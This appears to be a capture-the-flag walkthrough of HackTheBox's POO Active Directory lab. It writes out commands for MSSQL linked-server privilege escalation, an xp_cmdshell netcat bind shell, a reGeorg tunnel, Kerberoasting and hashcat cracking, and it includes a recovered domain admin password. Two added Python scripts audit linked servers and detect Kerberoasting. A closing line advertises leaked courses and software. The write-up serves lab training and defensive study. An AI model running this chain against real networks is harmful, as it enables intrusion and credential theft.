HackTheBox endgame. Professional Offensive Operations lab walkthrough. Active Directory pentest

In this article we will walk through not just a single machine, but a whole small lab from the HackTheBox site.

As stated in the description, POO is designed to test skills at every stage of an attack in a small Active Directory environment. The goal is to compromise the accessible host, escalate privileges, and finally compromise the entire domain while collecting 5 flags.

The lab is reached over VPN. It is recommended not to connect from a work computer or from a host that holds data important to you, since you are joining a private network together with people who know a thing or two about information security :)

Organizational information
So that you can learn about new articles, software and other information, I created a Telegram channel and a group for discussing any questions in the field of information and computer security. I will also personally review your requests, questions, suggestions and recommendations and answer everyone.

All information is provided for educational purposes only. The author of this document bears no responsibility for any damage caused to anyone as a result of using the knowledge and methods obtained from studying this document.

Intro

This endgame consists of two machines and contains 5 flags.

A description and the address of the accessible host are also provided.

Let's begin!

Recon flag

This machine has the IP address 10.13.38.11, which I add to /etc/hosts.
10.13.38.11 poo.htb

The first step is to scan for open ports. Since scanning all ports with nmap takes a long time, I will first do it with masscan. We scan all TCP and UDP ports from the tun0 interface at 500 pps.

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

Now, to get more detailed information about the services running on those ports, let's run a scan with the -A option.

nmap -A poo.htb -p80,1433

So we have IIS and MSSQL services. Along the way we learn the real DNS name of the domain and the computer name. On the web server we are greeted by the IIS home page.

Let's enumerate directories. I use gobuster for this. In the parameters we specify the number of threads, 128 (-t), the URL (-u), the wordlist (-w) and the extensions we are interested in (-x).

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

This gives us HTTP authentication on the /admin directory, as well as an accessible .DS_Store file. .DS_Store files store custom settings for a folder, such as the list of files, icon positions and the chosen background image. Such a file can end up in a web server directory through a web developer's oversight. This way we obtain information about the directory contents. For this you can use the DS_Store crawler.

python3 dsstore_crawler.py -i http://poo.htb/

We obtain the directory contents. The most interesting thing here is the /dev directory, in which we can see source and db files in two branches. But we can work with the first 6 characters of file and directory names if the service is vulnerable to the IIS ShortName issue. You can check for this vulnerability with the IIS ShortName Scanner.

And we find a single text file whose name begins with "poo_co". Not knowing what to do next, I simply selected from the directory wordlist all words beginning with "co".

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

And we iterate through them with wfuzz.

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

And we find the matching word! We look at this file and save the credentials (judging by the DBNAME parameter, they are for MSSQL).

We submit the flag and advance to 20%.

Huh flag

We connect to MSSQL; I use DBeaver.

Finding nothing interesting in this database, let's open an SQL editor and check which users exist.

SELECT name FROM master..syslogins;

We have two users. Let's check our privileges.

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

So, no privileges. Let's look at linked servers; I wrote about this technique in detail here.

SELECT * FROM master..sysservers;

So we find another SQL Server. Let's check command execution on that server using openquery().

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

And we can even build a nested query tree.

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

The thing is, when we send a query to a linked server, the query is executed in the context of a different user! Let's see which user context our query runs under on the linked server.

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

Now let's see in which context a query from the linked server back to ours is executed!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

So it is the DBO context, which should have all privileges. Let's check the privileges when the query comes back from the linked server.

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

As you can see, we have all privileges! Let's create our own admin. But openquery does not allow this, so let's do it through EXECUTE AT.

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
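The loop-back just used (our instance links to the second server, which links back to ours as a sysadmin) is a configuration defect an administrator can audit for. The script below is an added example, not code from the write-up: it models rows in the shape of sys.servers joined with sys.linked_logins and reports every chain of catch-all login mappings that returns to its starting instance with a sysadmin remote login. The instance names, remote logins and the remote_sysadmin flag are constructed assumptions, not values captured in the lab.

```python
# Added audit example (not part of the original write-up): find linked-server
# chains that lead back to the starting instance as a sysadmin remote login.
# The rows below are constructed in the shape of sys.servers joined with
# sys.linked_logins; instance names, logins and the remote_sysadmin flag are
# assumptions, not values captured in the lab.
from collections import defaultdict

SAMPLE_LINKS = [
    # local_login None = catch-all mapping (applies to every local login)
    {"src": "POO_PUBLIC", "link": "COMPATIBILITYPOO_CONFIG", "dst": "POO_CONFIG",
     "local_login": None, "remote_login": "config_reader", "remote_sysadmin": False},
    {"src": "POO_CONFIG", "link": "COMPATIBILITYPOO_PUBLIC", "dst": "POO_PUBLIC",
     "local_login": None, "remote_login": "sa", "remote_sysadmin": True},
]


def sysadmin_loopbacks(links, max_hops=4):
    """Return every chain of link names that starts on an instance, follows
    only catch-all mappings, and arrives back on that instance as a sysadmin.
    Each such chain lets any local login run as sysadmin at home through
    nested openquery() / EXECUTE ... AT, which is the escalation shown above."""
    out_edges = defaultdict(list)
    for link in links:
        if link["local_login"] is None:  # mappings for one named login are skipped
            out_edges[link["src"]].append(link)

    found = []

    def walk(origin, node, path):
        if len(path) >= max_hops:  # bound the search; other cycles are cut here
            return
        for edge in out_edges[node]:
            chain = path + [edge["link"]]
            if edge["dst"] == origin:
                if edge["remote_sysadmin"]:
                    found.append(chain)
            else:
                walk(origin, edge["dst"], chain)

    for origin in list(out_edges):
        walk(origin, origin, [])
    return found


if __name__ == "__main__":
    for chain in sysadmin_loopbacks(SAMPLE_LINKS):
        print("sysadmin loop-back via: " + " -> ".join(chain))
```

On the constructed rows it reports exactly one chain, COMPATIBILITYPOO_CONFIG -> COMPATIBILITYPOO_PUBLIC; mapping the return link to a non-sysadmin remote login makes the finding disappear.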

And now we connect with the new user's credentials and find the new flag database.

We submit this flag and move on.

BackTrack flag

Let's get a shell through MSSQL; I use mssqlclient from the impacket package.

mssqlclient.py ralf:ralfralf@poo.htb -db POO_PUBLIC

We need to obtain passwords, and the first thing we have already come across is the site. So we need the web server configuration (it is impossible to get a proper shell out; apparently a firewall is in place).

But access is denied. Although we could read the file from MSSQL, we first need to know which programming languages are configured for it. And in the MSSQL directory we find that Python is present.

Then reading the web.config file is no problem.

EXEC sp_execute_external_script
@language = N'Python',
@script = N'print(open(r"C:\inetpub\wwwroot\web.config").read())'

With the obtained credentials we go to /admin and take the flag.

Foothold flag

Admittedly, the firewall in use causes some inconvenience, but looking through the network settings we notice that the IPv6 protocol is also in use!

Add this address to /etc/hosts.
dead:babe::1001 poo6.htb
Let's scan the host again, but this time over IPv6.

And the WinRM service is available over IPv6. Let's connect with the credentials we found.

There is a flag on the desktop; we submit it.

P00ned flag

After running winpeas on the host we found nothing special. Then it was decided to look for credentials again (I also wrote an article on this topic). But I could not get all the SPNs from the system via WinRM.

setspn.exe -T intranet.poo -Q */*

Let's run the command through MSSQL instead.

This way we get the SPNs of the users p00_hr and p00_adm, which means they are exposed to an attack such as Kerberoasting. In short, we can obtain hashes of their passwords.

First we need a stable shell on behalf of the MSSQL user. But since our access is limited, we can only reach the host through ports 80 and 1433. Still, it is possible to tunnel through port 80! For this we use the reGeorg application. Let's upload the tunnel.aspx file to the web server's home directory, C:\inetpub\wwwroot.

But when we try to access it, we get a 404 error. This means that *.aspx files are not executed. To execute files with this extension, install ASP.NET 4.5 as follows.

dism /online /enable-feature /all /featurename:IIS-ASPNET45

And now, when we access tunnel.aspx, we get a response that everything is ready to go.

Let's start the client part of the application, which will relay the traffic. We will forward all traffic from local port 5432 to the server.

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

And we use proxychains to send any application's traffic through this proxy. Let's add the proxy to the /etc/proxychains.conf config file.

Now let's upload to the server the netcat program, with which we will make a stable bind shell, and the Invoke-Kerberoast script, with which we will carry out the Kerberoasting attack.

Now, through MSSQL, we start the listener.

xp_cmdshell C:\temp\nc64.exe -e powershell.exe -lvp 4321

And we connect through the proxy.

proxychains rlwrap nc poo.htb 4321

And let's get the hashes.

. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:\temp\kerb_hashes.txt' -Width 8000
type kerb_hashes.txt

Next, these hashes need to be cracked. Since the passwords were not in rockyou, I used ALL the password wordlists shipped in Seclists. For cracking we use hashcat.

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

And we get two passwords, the first from the dutch_passwordlist.txt wordlist, the second from Keyboard-Combinations.txt.
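From the defender's side, the service-ticket requests Invoke-Kerberoast just made are visible in Windows Security event 4769. The script below is an added detection example, not code from the write-up: it parses constructed 4769 records (an assumed flattened "key=value; ..." export format; the SPN account names echo the lab, the client IPs, timestamps and requesting accounts are made up) and flags clients that request RC4-encrypted tickets for several user-account SPNs within a short window.

```python
# Added detection example (not part of the original write-up): spot the
# Kerberoasting signature in Windows Security event 4769 records.  The records
# are constructed here as flattened "key=value; ..." lines in an assumed export
# format; the SPN account names echo the lab, everything else is made up.
from collections import defaultdict
from datetime import datetime

RC4_HMAC = 0x17  # TicketEncryptionType requested by Invoke-Kerberoast and friends

SAMPLE_4769 = [
    "time=2020-05-10T10:00:01; account=user1; service=p00_hr; enc=0x17; client=10.10.14.5",
    "time=2020-05-10T10:00:02; account=user1; service=p00_adm; enc=0x17; client=10.10.14.5",
    "time=2020-05-10T10:00:05; account=user1; service=krbtgt; enc=0x12; client=10.10.14.5",
    "time=2020-05-10T10:30:00; account=alice; service=DC$; enc=0x12; client=10.13.38.30",
    "time=2020-05-10T10:30:01; account=alice; service=svc_sql; enc=0x17; client=10.13.38.30",
]


def parse_event(line):
    """Parse one flattened 4769 record; enc becomes an int, time a datetime."""
    fields = dict(part.strip().split("=", 1) for part in line.split(";"))
    fields["enc"] = int(fields["enc"], 16)
    fields["time"] = datetime.fromisoformat(fields["time"])
    return fields


def is_roastable_request(ev):
    """RC4 ticket for a user-account SPN.  Machine accounts (name$) and krbtgt
    are excluded: their keys are long and random, so such tickets do not crack."""
    svc = ev["service"]
    return ev["enc"] == RC4_HMAC and not svc.endswith("$") and svc.lower() != "krbtgt"


def kerberoast_sources(lines, min_services=2, window_seconds=300):
    """Return {client: sorted SPN accounts} for clients that requested RC4
    tickets for at least min_services distinct user SPNs inside one window."""
    by_client = defaultdict(list)
    for ev in map(parse_event, lines):
        if is_roastable_request(ev):
            by_client[ev["client"]].append(ev)
    flagged = {}
    for client, evs in by_client.items():
        evs.sort(key=lambda e: e["time"])
        for i, first in enumerate(evs):  # slide a window from each event
            in_window = [e for e in evs[i:]
                         if (e["time"] - first["time"]).total_seconds() <= window_seconds]
            services = {e["service"] for e in in_window}
            if len(services) >= min_services:
                flagged[client] = sorted(services)
                break
    return flagged


if __name__ == "__main__":
    for client, spns in kerberoast_sources(SAMPLE_4769).items():
        print(f"{client}: RC4 service tickets for {', '.join(spns)}")
```

A single RC4 request (the svc_sql line) stays below the default threshold; lowering min_services to 1 reports it too, which is the trade-off between noise and coverage on real logs.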

So we have three users; let's head for the domain controller. First let's find out its address.

Great, we learned the IP address of the domain controller. Let's find out all the domain users, and which of them is an administrator. To get this information, download the PowerView.ps1 script. Then we connect using evil-winrm, specifying the directory with the script in the -s parameter. Then we simply load the PowerView script.

Now we have access to all of its functions. The user p00_adm looks like a privileged one, so we will work in his context. Let's create a PSCredential object for this user.

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

Now every PowerShell command where we pass Creds will be executed as p00_adm. Let's display the list of users with their AdminCount attribute.

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

So our user really is privileged. Let's see which groups he belongs to.

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

Finally we confirm that the user is a domain administrator. This gives him the right to log on to the domain controller remotely. Let's try to log in via WinRM through our tunnel. I was confused by the errors reGeorg produced when used with evil-winrm.

So let's use another, simpler script to connect to WinRM. Open it and change the connection parameters.

We try to connect, and we are in the system.

But there is no flag. So let's check the user and look at the computers.

On mr3ks we find the flag, and the lab is completed 100%.

That's all. As feedback, please comment on whether you learned anything new from this article and whether it was useful to you.

You can join us on Telegram. There you can find interesting materials, leaked courses and software. Let's build a community in which there are people who understand many areas of IT, so that we can always help each other with any IT and information security issue.

source: www.habr.com
